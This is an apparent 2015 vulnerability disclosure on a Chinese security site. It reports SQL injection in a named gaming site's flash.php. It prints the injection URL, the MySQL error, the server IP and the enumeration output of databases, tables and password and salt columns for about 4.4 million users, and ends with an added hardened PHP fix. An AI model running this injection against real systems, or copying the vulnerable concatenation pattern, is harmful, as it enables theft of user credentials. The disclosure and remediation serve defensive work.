
Youxiwo (游戏窝) has a serious SQL injection, and its fix - Website Security - 自学

Source: 自学PHP网    Date: 2015-04-17 14:47

Brief description:

265g.com (Youxiwo). 440W (4.4 million) records. A serious SQL injection vulnerability on one sub-site has led to a large-scale leak of user information. Please fix it promptly.

Details:

http://my.265g.com/flash.php?fgid=21'

MySQL Error
Message: MySQL Query Error
SQL: SELECT * FROM uchome_app_fgamelist Where fgid=21'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Errno.: 1064
Click here to seek help.

No further explanation needed; the data has most likely already been taken by others.

Proof of vulnerability:

Target: http://my.265g.com/flash.php?fgid=21
Host IP: 219.129.216.204
Web Server: nginx
Powered-by: PHP/5.3.6
DB Server: MySQL error based
Resp. Time(avg): 204 ms
Current User: user@127.0.0.1
Sql Version: 5.5.11
Current DB: uchome
System User: user@127.0.0.1
Host Name: qyeee
Installation dir: /usr/local/mysql
DB User: 'user'@'%'
Data Bases: information_schema, discuz, g265, test, ucenter, uchome

Count(table_name) of information_schema.tables where table_schema=0x7563656E746572 is 33
Tables found: code, uc_admins, uc_applications, uc_badwords, uc_domains, uc_failedlogins, uc_feeds, uc_friends, uc_mailqueue, uc_memberfields, uc_members, uc_mergemembers, uc_newpm, uc_notelist, uc_pm_indexes, uc_pm_lists, uc_pm_members, uc_pm_messages_0, uc_pm_messages_1, uc_pm_messages_2, uc_pm_messages_3, uc_pm_messages_4, uc_pm_messages_5, uc_pm_messages_6, uc_pm_messages_7, uc_pm_messages_8, uc_pm_messages_9, uc_protectedmembers, uc_settings, uc_sqlcache, uc_tags, uc_vars, uc_wb

Count(column_name) of information_schema.columns where table_schema=0x7563656E746572 and table_name=0x75635F6D656D62657273 is 15
Columns found: uid, username, password, email, myid, myidkey, regip, regdate, lastloginip, lastlogintime, salt, secques, qdjf, qdjy, openid

Database: ucenter
Table: uc_members
[15 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| lastloginip   | int(10)               |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| openid        | varchar(50)           |
| password      | char(32)              |
| qdjf          | int(11)               |
| qdjy          | int(11)               |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(15)              |
+---------------+-----------------------+

Count(*) of ucenter.uc_members is 4433975

The rest is omitted.

Fix:

Filter the input.
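A hardened version of the lookup, as an added example that is not code from this page, from 265g.com or from UCHome: the original flash.php is not shown, so the vulnerable pattern below is a hypothetical reconstruction of what produces the query in the error message, and the fixed function rejects any fgid that is not a positive integer before building SQL and binds the value through a PDO prepared statement. Function names, the DSN and the credentials are placeholders.

```php
<?php
// Added example, not code from the page or from UCHome. flash.php itself is not on
// the page; this is a hypothetical reconstruction of the pattern behind the error
// "SELECT * FROM uchome_app_fgamelist Where fgid=21'".

// Hypothetical vulnerable pattern: the raw query-string value is concatenated into
// the SQL text, so fgid=21' produces the broken statement and MySQL error 1064.
function buildQueryUnsafe($fgid) {
    return "SELECT * FROM uchome_app_fgamelist WHERE fgid=$fgid";
}

// Hardened lookup: fgid must be a plain positive integer. Anything else is rejected
// before any SQL exists, and the value is bound as a parameter, never interpolated.
function fetchGame(PDO $db, $rawFgid) {
    // is_string guards against fgid[]=1 (PHP turns that into an array);
    // ctype_digit rejects "21'", "21 OR 1=1", "", "-1" and " 21";
    // the length cap keeps the (int) cast well inside the mediumint/int range.
    if (!is_string($rawFgid) || !ctype_digit($rawFgid) || strlen($rawFgid) > 9) {
        return null;
    }
    $fgid = (int)$rawFgid;
    if ($fgid < 1) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM uchome_app_fgamelist WHERE fgid = :fgid');
    $stmt->bindValue(':fgid', $fgid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (constructed; host, database name and credentials are placeholders):
// $db = new PDO('mysql:host=DB_HOST;dbname=DB_NAME;charset=utf8', 'DB_USER', 'DB_PASS', array(
//     PDO::ATTR_EMULATE_PREPARES => false,          // real server-side prepared statements
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
// ));
// $row = fetchGame($db, isset($_GET['fgid']) ? $_GET['fgid'] : '');
// if ($row === null) { header('HTTP/1.1 404 Not Found'); exit; }
```

Independently of the parameter check, the SQL text and MySQL error should never be echoed to the client as they are in the report above: that verbose error page is what turns a syntax error into an error-based extraction channel, so log database errors server-side and return a generic error instead.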

Author: Bloodwolf
